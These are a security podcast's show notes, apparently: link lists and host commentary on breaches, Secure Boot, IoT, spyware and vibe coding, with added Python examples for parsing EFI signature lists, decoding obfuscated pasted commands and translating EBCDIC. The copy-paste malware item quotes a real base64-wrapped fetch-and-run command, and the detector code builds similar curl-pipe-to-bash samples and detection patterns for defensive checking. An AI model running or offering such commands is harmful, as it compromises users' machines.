This week:
- Americans Can't Hack It
- Copy and paste to get malware
- Pixel 5 web servers - because you can
- How they got in and why security is hard
- Vulnerability management is failing - is it dead yet?
- Exploiting hacker tools
- Bluetooth spending spree!
- How to defend your car
- IoT security solutions and other such lies
- Exploiting IBM i (formerly AS/400)
- Vibe coding vulnerabilities
- Plex is hacked again
- Bill's emoji
- ICE spies on phones
- Hackers be hackin' FreePBX
Join us for InfoSec World 2025 — October 27 to 29 in sunny Lake Buena Vista, Florida at Disney’s Coronado Springs Resort! Workshops run October 25–26 and October 29–30. The premier cybersecurity conference is here — save 25% with code ISW25-SW at securityweekly.com/ISW2025!
Paul Asadoorian
- Apple’s new Memory Integrity Enforcement system deals a huge blow to spyware developers
- npm Author Qix Compromised via Phishing Email in Major Suppl…
- Exploiting the Impossible: A Deep Dive into A Vulnerability Apple Deems Unexploitable
- Some People Are Really Crapping All Over Secure Boot
There is a 10-part series, all about how Microsoft and Secure Boot are evil, calling the Secure Boot certificate expiration things such as "The Secure Boot 9/11". Don't believe the hype. You should enable Secure Boot on your systems. Does it have problems? Certainly. This does not mean you should not use it, as no security solution is perfect. There is a lot of axe grinding, even lawsuits filed against security researchers, going on according to this site. It comes up often in my automated searches for UEFI and Secure Boot. Most of it is FUD, for example they state: "One might say that Microsoft staged a coup against BIOS" - That's not the case at all. Check out my Below The Surface podcast for more information about UEFI, including interviews with folks such as Vince Zimmer on how it came to be. Finally, if you are that unhappy with the state of Secure Boot, it is possible to fully create and manage your own Secure Boot keys and a root of trust for your system, giving you independent control with no reliance on vendor or Microsoft certificates.
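The "manage your own keys" path ends with writing your certificates into the PK, KEK and db variables, and those variables hold EFI_SIGNATURE_LIST structures from the UEFI spec. The following is an added example (not from the series, Paul's podcast, or efitools) that builds such a list from a certificate the way cert-to-efi-sig-list does, and parses a db blob back so you can audit what your firmware actually trusts. The certificate bytes are a constructed placeholder, not a real X.509 DER; the owner GUID is an arbitrary value you would replace with your own.

```python
"""Build and parse EFI_SIGNATURE_LIST blobs, the on-disk format of the PK, KEK,
db and dbx Secure Boot variables. Added example for these notes; the "cert"
below is constructed filler, not a real certificate."""
import struct
import uuid

# GUIDs from the UEFI spec. EFI_GUID is stored mixed-endian, which is exactly
# what uuid.UUID.bytes_le produces.
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
# EFI_IMAGE_SECURITY_DATABASE_GUID, the vendor GUID of db/dbx in efivarfs.
IMAGE_SECURITY_DATABASE_GUID = uuid.UUID("d719b2cb-3d3a-4596-a3bc-dad00e67656f")

# EFI_SIGNATURE_LIST header: SignatureType, SignatureListSize,
# SignatureHeaderSize, SignatureSize (28 bytes total).
ESL_HEADER = struct.Struct("<16sIII")


def build_esl(sig_type, owner, entries):
    """Return one EFI_SIGNATURE_LIST holding `entries`.

    Every EFI_SIGNATURE_DATA in a list is SignatureSize bytes: a 16-byte
    SignatureOwner GUID followed by the payload (a DER cert, or a SHA-256 for
    dbx hash entries), so all payloads in one list must have the same length.
    """
    if not entries:
        raise ValueError("a signature list needs at least one entry")
    sig_size = 16 + len(entries[0])
    if any(16 + len(e) != sig_size for e in entries):
        raise ValueError("all signatures in one list must have the same size")
    body = b"".join(owner.bytes_le + e for e in entries)
    list_size = ESL_HEADER.size + len(body)
    return ESL_HEADER.pack(sig_type.bytes_le, list_size, 0, sig_size) + body


def parse_esl(blob):
    """Return [(type_guid, owner_guid, payload), ...] for a concatenation of
    signature lists, which is what a db or dbx variable contains."""
    out = []
    off = 0
    while off < len(blob):
        if len(blob) - off < ESL_HEADER.size:
            raise ValueError("truncated signature list header")
        sig_type, list_size, hdr_size, sig_size = ESL_HEADER.unpack_from(blob, off)
        if list_size < ESL_HEADER.size + hdr_size or off + list_size > len(blob):
            raise ValueError("bad SignatureListSize")
        payload_len = list_size - ESL_HEADER.size - hdr_size
        if sig_size < 16 or payload_len % sig_size:
            raise ValueError("bad SignatureSize")
        pos = off + ESL_HEADER.size + hdr_size  # skip any SignatureHeader
        end = off + list_size
        while pos < end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            out.append((uuid.UUID(bytes_le=sig_type), owner, blob[pos + 16:pos + sig_size]))
            pos += sig_size
        off = end
    return out


def contains(blob, payload):
    """True if `payload` (a DER cert or a hash) is an entry in the variable."""
    return any(p == payload for _, _, p in parse_esl(blob))


def read_efivar(path):
    """Read a variable from efivarfs; the first 4 bytes are the attribute word,
    not variable data, so drop them before parsing."""
    with open(path, "rb") as fh:
        return fh.read()[4:]


# Constructed inputs: a fake "certificate" and an arbitrary owner GUID.
FAKE_CERT = b"\x30\x82\x01\x00" + b"A" * 20
OWNER = uuid.UUID("11111111-2222-3333-4444-555555555555")

if __name__ == "__main__":
    db = build_esl(EFI_CERT_X509_GUID, OWNER, [FAKE_CERT])
    db += build_esl(EFI_CERT_SHA256_GUID, OWNER, [b"\x01" * 32, b"\x02" * 32])
    for sig_type, owner, payload in parse_esl(db):
        kind = "x509" if sig_type == EFI_CERT_X509_GUID else "sha256"
        print(kind, owner, len(payload), "bytes")
```

On a Linux box with efivarfs mounted, read_efivar("/sys/firmware/efi/efivars/db-d719b2cb-3d3a-4596-a3bc-dad00e67656f") gives you the raw db to feed parse_esl, and contains() answers the question the series is arguing about: whether a given vendor certificate is actually in your trust list. Note that parse_esl only validates framing; it does not check the X.509 payloads, and writing a list back into PK or KEK still requires it to be wrapped in an authenticated variable (signed with the current PK) as the spec requires.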
- PoC Exploit Released for ImageMagick RCE Vulnerability – Update Now
- Leveraging Raw Disk Reads to Bypass EDR
- Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
- TLS NoVerify: Bypass All The Things
- Stealthy Persistence With Non-Existent Executable File
- I Hacked BellaBot and Every Robot from China’s Biggest Robotics Company (Pudu Only Fixed It When I Told Their Clients)
- GitHub – ericescobar/MeshC2
- MeetC2 a.k.a Meeting C2
- Inline Style Exfiltration: leaking data with chained CSS conditionals
- Start hacking Bluetooth Low Energy today! (part 3)
Nice primer on how to use the nRF5340 Dev Kit (https://www.nordicsemi.com/Products/Development-hardware/nRF5340-DK), I picked up mine from Digikey for $49 (https://www.digikey.com/en/products/detail/nordic-semiconductor-asa/NRF5340-DK/13544603?utmsource=oemsecrets&utmmedium=aggregator&utm_campaign=buynow)
- ZDI-25-884 – QEMU uefi-vars Uninitialized Memory Information Disclosure Vulnerability
"The specific flaw exists within the uefi-vars device. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the emulator." - I feel like this is something I would use when emulating UEFI in QEMU, which I've done once (through this project, which was developed by my co-workers: https://github.com/hacking-support/DVUEFI). Always good to make sure you keep your tools up-to-date. Of course, this is a double-edged sword. Sure, you may be testing some firmware/software or malware sample, but when it attacks your system it could be a bad day. On the flip side, it's often so difficult to get all of your tools working that upgrading a component could also be a bad day. Example: I recently started building VMs running Ubuntu with different versions for different analysis software.
- Tim Pierce (@unchi.org) – Copy and paste for malware
All too often, we click the little copy button next to a command, then paste it and run it. In this case, it could have been a bad day:
- The "Copy" button on that page copies the following text: echo "Y3VybCAtcyBodHRwczovL2dhbW1hLm1lc2hzb3J0ZXJpby5jb20vc3RyaXgvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash
- and that base64 string actually expands to (URL defanged): curl -s httpx://gamma.meshsorterio.com/strix/index.php | nohup bash
Don't let the bad days win!
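The habit that would have caught this is to look at what a pasted command really executes before pressing Enter. Below is an added example (not from Tim Pierce's post) that unwraps the echo-then-decode-then-pipe-to-shell pattern, including nested layers and hex (xxd -r -p) as well as base64, and reports the indicators a practitioner cares about: what the final command downloads, from which host, and whether it backgrounds itself with nohup or a trailing ampersand. The sample commands are constructed and point at an .invalid domain.

```python
"""Decode obfuscated "copy this command" snippets before running them.
Added example for these notes, not the original post's code; SAMPLE_* values
are constructed test vectors pointing at a reserved .invalid domain."""
import base64
import binascii
import re

SHELL = r"(?:ba|z|da|k)?sh"
# echo <blob> | base64 -d | bash   (also --decode, xxd -r -p, nohup, quotes)
DECODE_PIPE = re.compile(
    r"""echo\s+(?:-[neE]+\s+)?["']?([A-Za-z0-9+/=]{16,})["']?\s*\|\s*"""
    r"""(base64\s+(?:-d|--decode)|xxd\s+-r\s+-p)\s*\|\s*(?:nohup\s+)?""" + SHELL)
# curl/wget output piped straight into a shell
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:nohup\s+)?" + SHELL + r"\b")
URL_HOST = re.compile(r"https?://([^/\s'\"]+)")


def unwrap(cmd, max_layers=4):
    """Peel decode-and-execute wrappers. Returns (innermost_command, layers)
    where layers lists each decoded stage from outermost inward."""
    layers = []
    for _ in range(max_layers):
        m = DECODE_PIPE.search(cmd)
        if not m:
            break
        blob, decoder = m.group(1), m.group(2)
        try:
            if decoder.startswith("base64"):
                raw = base64.b64decode(blob, validate=True)
            else:
                raw = binascii.unhexlify(blob)
        except (binascii.Error, ValueError):
            break  # not decodable: stop and report what we have
        inner = raw.decode("utf-8", errors="replace")
        layers.append(inner)
        cmd = inner
    return cmd, layers


def inspect(cmd):
    """Human-readable findings for a pasted command; empty list means nothing
    suspicious was recognised (which is not the same as safe)."""
    final, layers = unwrap(cmd)
    findings = []
    if layers:
        findings.append(f"{len(layers)} encoded layer(s) hiding: {final.strip()}")
    if PIPE_TO_SHELL.search(final):
        findings.append("downloads and executes remote content without review")
    for host in URL_HOST.findall(final):
        findings.append(f"contacts {host}")
    if re.search(r"\bnohup\b", final) or final.rstrip().endswith("&"):
        findings.append("backgrounds itself so it keeps running after the terminal closes")
    return findings


# Constructed samples shaped like the real one, but pointing at .invalid.
SAMPLE_PAYLOAD = "curl -s https://gamma.example.invalid/strix/index.php | nohup bash &"
SAMPLE_PASTE = 'echo "%s" | base64 -d | bash' % base64.b64encode(
    SAMPLE_PAYLOAD.encode()).decode()
SAMPLE_NESTED = "echo %s | base64 -d | sh" % base64.b64encode(
    SAMPLE_PASTE.encode()).decode()
SAMPLE_HEX = "echo %s | xxd -r -p | bash" % SAMPLE_PAYLOAD.encode().hex()

if __name__ == "__main__":
    for sample in (SAMPLE_PASTE, SAMPLE_NESTED, SAMPLE_HEX, "sudo apt install jq"):
        print(sample[:60] + ("..." if len(sample) > 60 else ""))
        for line in inspect(sample) or ["  nothing recognised"]:
            print("  -", line)
```

Wire inspect() to whatever reads your clipboard (xclip -o, pbpaste, wl-paste) and you get a one-second sanity check before running anything copied from a web page. The regexes deliberately cover only the common wrappers; a payload hidden in a variable expansion or in an eval of command substitution will pass unrecognised, which is why an empty result is "nothing found", not a clean bill of health.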
- Venezuela’s President Maduro said his Huawei Mate X6 cannot be hacked by US cyber spies
There are just some things you don't say: "Impressive, I find out everything through this, the phone that Xi Jinping gave me. Look, Xi Jinping gave me this, a Huawei, the best phone in the world, the Huawei, and the Americans can't hack it, neither their spy planes, nor their satellites." said Venezuela's president. Saying something cannot be hacked has not gone well. I don't believe whoever runs the Vegas Sphere said they could not be hacked, but I haven't seen it get hacked yet. Oracle's Larry Ellison is quoted as saying: "Oracle is the only software that's unbreakable." That was in 2015. Lots of Oracle vulnerabilities have been announced and exploited since then. Including this week: https://arstechnica.com/security/2025/09/as-hackers-exploit-one-high-severity-sap-flaw-company-warns-of-3-more/
- Back to President Maduro: China has already hacked your phone, as it's likely to be pre-0wned or already infected. All the US needs to do is wake up the backdoor we planted in Huawei and gain access (Note: this is satire, I have no evidence to suggest that this is true, but it's fun to talk about!)
- This blog is running on a recycled Google Pixel 5
Why would you do this? Easy: Because you can. I can just see server farms popping up running on everyone's old phones. It's one way to recycle them anyhow. There are several hacks to do this with laptops too.
- How They Got In — DaVita Inc.
So where did they go wrong? From the article:
- "No MFA / VPN exposure → on critical VPN access solution — misconfiguration." - The other thing here is they were not monitoring the darkweb or external attack surface. If they were, they would have been changing credentials on accounts known to be compromised. Also, MFA across the board is super important.
- "Unpatched servers → Secrets Platform / Vault Stack RCE and Metric Solution." - There was also an unpatched IP camera exposed to the Internet. Again, regular vulnerability scans and attack surface monitoring, then taking action on those, would have helped. We get too hung up on trying to scan and prioritize. What you have hanging on the Internet for all to see takes the top priority in my mind.
- "Weak monitoring → Open directories and brand impersonation sites left active for months." - They did not do any brand monitoring (e.g. Domain tools or other ASM vendors) to identify phishing domains related to their company. If they were able to block or take down these domains, it would have been a good defensive step.
- "A publicly traded company in the healthcare industry should not use WordPress as its primary web platform because its widespread plugin vulnerabilities and lack of default HIPAA compliance pose critical risks of data breaches, regulatory violations, and loss of patient trust." - Not sure I agree with this. All software is vulnerable, to what extent depends on the implementation.
I don't want to shame them. They do have a CISO that has been there for 20+ years. It is not easy to defend a Fortune 500 publicly traded company from attackers. However, hopefully things improve based on the report, which looks like it was published for free!
- The Critical Failure in Vulnerability Management
The article actually calls out 3 areas where vulnerability management is failing, I will expand on some of these thoughts:
- "There's comfort in being able to say, "Look at the breadth of what we've scanned." However, sometimes more is not better; more scans are just more scans." - When I worked in VM, this was one of the problems we chose to solve. That is, you have so many assets that you need to scan all of them, and whoever can identify the most vulnerabilities will win. Turns out we all lost. VM vendors climbed the "who can find the most stuff" mountain, rather than who can identify the most critical vulnerabilities and help teams remediate them.
- "Some vendors are faring better because they have been able to shift their business model from selling traditional vulnerability management to integrated risk management solutions, with a heavy emphasis on cloud." - The problem for VM with respect to the cloud is that we own less of the infrastructure and can spin up new infrastructure that is more secure by default, therefore, VM is not as crucial in cloud environments. However, VM vendors doubled down, acquiring container management companies like they were going out of style. Many problems arise, for example, development teams use different solutions to secure containers, and not the ones offered by VM vendors. This shift in focus took away from research and product features that could help in other areas, such as security and network appliances, which can be physical or virtual.
- "Increasingly, threat actors are exploiting vulnerabilities to bypass edge and network devices that are supposed to block their access. Once these devices are compromised, adversaries can move laterally and deeper into the network." - And if VM was really focusing here, we'd see better numbers in terms of remediation and perhaps less attacker focus on edge devices. In reality, it's not a pretty picture. This is pure gold as a statistic, though I did not fact check it: "Organizations are actively patching network device vulnerabilities; however, only 54% were fully remediated last year, and it took a median of 32 days to accomplish. Meanwhile, the average time to exploit vulnerabilities has dropped to five days."
So what do we do? According to the article:
- Prioritizing what needs to be fixed based on intelligence about our network risk
- Incorporating automation to help us fix what's critical or deploy a workaround
- Closing the loop by double-checking to make sure vulnerabilities are remediated
And if we could do all 3 of those things well we wouldn't need this article or the discussion, but yet, here we are.
- Flipper Zero Car Hacks Exposed: What’s Real and What’s Hype
Interesting defense recommendations:
- Use “double-lock” or “deadlock” modes (where available) and disable passive entry in settings if your car supports it; this prevents the car from waking for a hands-free handshake, which many emulator devices exploit. (Check your owner’s manual.)
- RF-protect key fobs at home (Faraday pouches/boxes) to blunt basic relay attacks; keep the spare far from doors/windows.
- Layer visible deterrents (steering-wheel locks, driveway posts) with hidden ones (aftermarket immobilizers, OBD port locks) so an unlocked door doesn’t equal a stolen car.
- Update vehicle software promptly; if your brand offers an anti-theft update—even a paid one—consider it until regulators force broader recalls.
and some have even pointed out that we are moving towards facial recognition to start your car: https://www.webpronews.com/facial-recognition-in-cars-boosting-security-against-high-tech-theft/
All these things may make it harder to break into or steal your vehicle, but the real answer is to fix the security problems before the cars ship and design solutions that are harder to defeat by criminals.
- darkmentorllc/Blue2thprinting – Xeno’s Bluetooth Stuff Is Awesome
Some of the best Bluetooth recon research is here. Now complete with free 8.5 hours of training and detailed hardware guides and links to purchase all the things. Caution: You will spend some of your hard earned money here, but so worth it. I picked up a few things already.
- How Has IoT Security Changed Over the Past 5 Years?
I'd argue it has not. The article points out things we've talked about on the show, nothing really new here. So how do we solve the IoT (in)security problem(s)? Here's a summary of my thoughts:
- Legislation - Historically, this has not worked, nor have the legislative efforts that were implemented been effective. Forcing vendors not to have default passwords is just part of the problem. And solutions are only implemented moving forward. There have been some fines and some prohibitions against certain vendors, but it's not even scratching the surface. We need smart legislation and hard and fast requirements that must be met in order to bring a product to the market, balanced with keeping the ability to enter the market easy.
- Incentives - Consumers and vendors will only act if there are positive incentives. New hardware that comes from the ISPs that gets rid of old and vulnerable devices would help. This is my "Save The Internet One IoT Device At A Time" program that would need funding and would incentivize ISPs and consumers to replace older devices.
- IoT Device Lockdown Mode - Vendors could implement protections, such as signed software, on the devices and other countermeasures to make it more difficult to successfully attack. There is no reason for authentication bypass and command injection vulnerabilities to be so easily exploited.
- Linux – Recreating old problems with new tools
I am a little dizzy after reading this article. I think it boils down to this:
- The nice thing about package managers is there are so many of them
- The nice thing about Linux distros is there are so many of them
- The nice thing about app stores is there are so many of them
The open ecosystem of Linux is what hurts adoption as a desktop platform. Just because you can customize something doesn't mean you should, yet most of the Linux ecosystem is comprised of customizations for kernels, userland, software, package management, etc... This HURTS security as it creates too much attack surface for anyone to defend well, except when you create your own standards for implementation and deployment of Linux.
- Exploit development for IBM i
"And just like that, we had an interactive shell with full command output, running entirely within IBM i’s own environment, with no need for external binaries or reverse connections." - Nice work! I enjoyed how they were able to convert all the things to EBCDIC to get it working. Also, IBM i systems are just AS/400s, here's the AI slop:
- The original AS/400, launched in 1988, was a midrange server running the OS/400 operating system, known for its integrated hardware/software design, reliability, and use of the RPG programming language.
- Over the years, the platform underwent several rebrandings: it became the iSeries, then System i, and finally IBM i (the OS) running on Power Systems servers.
- The IBM i operating system embodies all advancements and retains strong backward compatibility—most applications written for AS/400 can run on modern IBM i systems with minimal changes, but the hardware and software have evolved substantially.
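The EBCDIC conversion the researchers had to do is the part most people new to IBM i trip over: anything you send to a job running in a native EBCDIC CCSID, and anything it sends back, is byte-for-byte different from ASCII, and the exact mapping depends on which EBCDIC code page the job uses. The following is an added example (not the researchers' code) showing the translation both ways with Python's built-in code pages, plus a check for the characters whose byte value changes between common code pages, which is what silently breaks a payload when the target's CCSID is not the one you assumed. The command string is constructed.

```python
"""ASCII <-> EBCDIC translation for IBM i payloads and output. Added example
for these notes, not from the article; sample strings are constructed."""

# Common EBCDIC code pages: cp037 (US/Canada), cp500 (International),
# cp1140 (cp037 with the euro sign). All are in the Python standard library.
PAGES = ("cp037", "cp500", "cp1140")


def to_ebcdic(text, page="cp037"):
    """Encode a command for a job running under the given EBCDIC code page."""
    return text.encode(page)


def from_ebcdic(data, page="cp037"):
    """Decode output captured from an EBCDIC job back to text."""
    return data.decode(page)


def unstable_chars(text, pages=PAGES):
    """Characters in `text` whose EBCDIC byte differs across `pages`.

    These are the ones to avoid (or to encode per-target) in a payload:
    the bracket/bang/bar/caret family moves between cp037 and cp500, so a
    shell pipe that works on one LPAR can become a different byte on another.
    """
    unstable = []
    for ch in sorted(set(text)):
        encodings = set()
        for page in pages:
            try:
                encodings.add(ch.encode(page))
            except UnicodeEncodeError:
                encodings.add(None)  # unmappable on this page counts as unstable
        if len(encodings) > 1:
            unstable.append(ch)
    return unstable


def ascii_misread(data, page="cp037"):
    """What an EBCDIC buffer looks like if you forget to translate it and treat
    it as Latin-1/ASCII: the usual symptom of a missing conversion."""
    return data.decode("latin-1")


SAMPLE_COMMAND = "ls -la /tmp | wc -l"  # constructed

if __name__ == "__main__":
    raw = to_ebcdic(SAMPLE_COMMAND)
    print("ascii :", SAMPLE_COMMAND.encode("ascii").hex(" "))
    print("cp037 :", raw.hex(" "))
    print("round :", from_ebcdic(raw))
    print("as-is :", repr(ascii_misread(raw)))
    print("varies:", unstable_chars(SAMPLE_COMMAND))
```

The unstable_chars() result for the sample command flags the pipe character: in cp037 it is 0x4F, in cp500 it is 0xBB, so check the job's CCSID (the CCSID and QCCSID values on the system) before deciding which page to encode with. Everything else in a plain command (letters, digits, space, slash, dash) is the same across these pages.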
Why do we care? Here's the AI slop on who uses IBM i:
- Banking and Finance: Major banks like HSBC use IBM i for core banking operations thanks to its uptime and data integrity.
- Insurance: Companies such as United Heritage Insurance leverage IBM i for transactional backend operations, modernizing interfaces via APIs and web platforms.
- Manufacturing and Automotive: Firms like Kawasaki and Avesco AG use IBM i to run ERP, manufacturing, and analytics workloads, deploying both on-prem and in the cloud.
- Retail and Distribution: Retailers and logistics companies depend on IBM i for inventory, supply chain, and customer-facing functions, often integrating with digital and cloud tools.
- Telecommunications: Operators like Orange run operational and billing systems on IBM i, updating software to boost performance and extend the life of core applications.
- Public Sector & Government: Various banks and government agencies use IBM i for secure ledgers, citizen services, and financial infrastructure, especially where uptime and security are paramount.
- Resolved Authentication Bypass Vulnerability in Sophos AP6 Series Wireless Access Points Firmware (CVE-2025-10159)
AI Slop summary: "Sophos resolved a critical authentication bypass vulnerability (CVE-2025-10159) in its AP6 Series Wireless Access Points that allowed attackers to gain admin-level privileges if they could access the management IP address. Firmware version 1.7.2563 (MR7), released after 11 August 2025, contains the fix. Users with automatic updates are already protected, while those who disabled auto-updates must manually upgrade to receive the patch."
- Vibe Coding: A Pentester’s Dream
- TL;DR: They vibe coded a web app and told the LLM to secure it in specific ways. Then they did a pen test on it, and discovered vulnerabilities.
- The answer? "You need to have your application penetration tested! Specifically, tested by people who have the ability to understand how the application should behave and can perform security tests based on that expectation."
- I vibe coded a shell script today. It called functions that it somehow forgot to create. Twice. Very weird. It also did not put in error checking where it needed to. Vibe coding is still a junior programmer at best. But since I have some programming experience it still saved me time. And there's the key, AI can help programmers with experience!
- A pen test is a great thing, but not the answer here. There are many steps involved in creating secure, reliable, and resilient software. A pen test is one small step, but I'd argue all the other steps are more important.
Bill Swearingen
- HexStrike AI MCP Agents
HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.) autonomously run 150+ cybersecurity tools for automated pentesting, vulnerability discovery, bug bounty automation, and security research. Seamlessly bridge LLMs with real-world offensive security capabilities.
- plex has been hacked (again)
We have recently experienced a security incident that may potentially involve your Plex account information. We believe the actual impact of this incident is limited; however, action is required from you to ensure your account remains secure.
What happened
An unauthorized third party accessed a limited subset of customer data from one of our databases. While we quickly contained the incident, information that was accessed included emails, usernames, securely hashed passwords and authentication data.
Reset your passwords
- How ICE Is Using Fake Cell Towers To Spy On People’s Phones
In a recently-unsealed search warrant reviewed by Forbes, ICE used such a cell-site simulator in an attempt to track down an individual in Orem, Utah. The suspect had been ordered to leave the U.S. in 2023, but is believed to still be in the country. Investigators learned last month that before going to Utah, he’d escaped prison in Venezuela where he was serving a sentence for murder, according to the warrant. He’s also suspected of being linked to gang activity in the country, investigators said.
- Tomorrow’s Emoji, Today: Unicode 17.0 Has Arrived
Bill is salty about this; my emoji was not accepted in Unicode 17. Once a year, Unicode drops its annual update: thousands of new characters, new scripts, new symbols, and of course… new emoji. Today marks the release of Unicode 17.0, adding 4,803 characters (bringing the grand total to 159,801!)
- You Already Have Our Personal Data, Take Our Phone Calls Too (FreePBX CVE-2025-57819)
Today, inside this hellscape we call the Internet, a mean person has discovered a zero-day(s) in FreePBX (now lovingly called CVE-2025-57819). But they didn’t stop there - the dastardly individual(s) then proceeded to exploit FreePBX hosts en-masse.
- Can I have a new password, please? The $400M question.
Back in August 2023, attackers tied to the Scattered Spider group didn’t exploit a zero-day vulnerability to hack Clorox. They simply called the service desk (run by Cognizant), claimed to be locked-out employees, and asked for password and MFA resets.
According to court filings and reporting, the attacker repeatedly phoned Cognizant’s service desk, obtained repeated resets without meaningful verification, and used the resulting access to move quickly toward domain-admin footholds.
Clorox says the attack ultimately led to roughly $380 million in damages, including about $49 million in remedial costs and “hundreds of millions” in business-interruption losses. We’ll walk through what happened, how to secure third-party service desks, and show how to enforce verification with the right technology.
- Signal adds secure cloud backups to save and restore chats
Signal has introduced a new opt-in feature that helps users create end-to-end encrypted backups of their chats, allowing them to restore messages even if their phones are damaged or lost.
Secure backups are already available in the latest Signal beta version for Android users and will also be rolled out to iOS and desktop devices after this testing phase.
"If you do decide to opt in to secure backups, you'll be able to securely back up all of your text messages and the last 45 days' worth of media for free. If you want to back up your media history beyond 45 days, as well as your message history, we also offer a paid subscription plan for US$1.99 per month," said Jim O'Leary, Signal's VP of Engineering.
- ICE Has Spyware Now
The Trump administration this week rescinded a Biden administration order that blocked ICE from obtaining hacking tools sold by Paragon, the Israeli firm with which it signed a $2 million contract last September. Now ICE will have access to the company's spyware, including tools for remotely breaking into phones and obtaining their contents and messages.
Paragon has been compared to the more notorious Israeli spyware firm NSO Group, with similar examples of its tools being used to spy on journalists and activists: WhatsApp said earlier this year that it had discovered Paragon’s spyware being used against activists and journalists in Europe, and two Italian media outlets filed a criminal complaint with prosecutors seeking an investigation into the hacking incidents. As a result of that blowup, Italian intelligence services canceled a contract with the company, according to Israeli news outlet Haaretz.
Larry Pesce
- An Attacker’s Blunder Gave Us a Look Into Their Operations
- Detecting Password-Spraying with a Honeypot Account
- npm debug and chalk packages compromised
- This Week In Security: DNS Oops, Novel C2s, And The Scam Becomes Real
- A University of Oregon student reported a troubling online privacy lapse. The university placed him under investigation
- Venezuela’s President Maduro said his Huawei Mate X6 cannot be hacked by US cyber spies
- Google Confirms Android Attacks—No Fix For 1 Billion Phones
- Identity 4 – 2025
- Researchers find spyware on phones belonging to Kenyan filmmakers
- A parliament in flames, a leader toppled. Nepal Gen-Z protesters ask: what comes next?